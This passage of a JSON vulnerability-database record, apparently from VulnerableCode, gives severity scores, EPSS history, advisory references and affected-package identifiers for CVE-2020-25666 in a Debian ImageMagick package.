"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-25666.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-25666", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31996", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32124", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32163", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31986", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32037", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32066", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.3207", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32031", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31999", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.32032", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.3201", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31984", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00127", "scoring_system": "epss", "scoring_elements": "0.31817", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-25666" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25666", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25666" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1891612", "reference_id": "1891612", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1891612" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-25666" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zv8w-puzj-23cd" } ], "risk_score": "4.0", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" }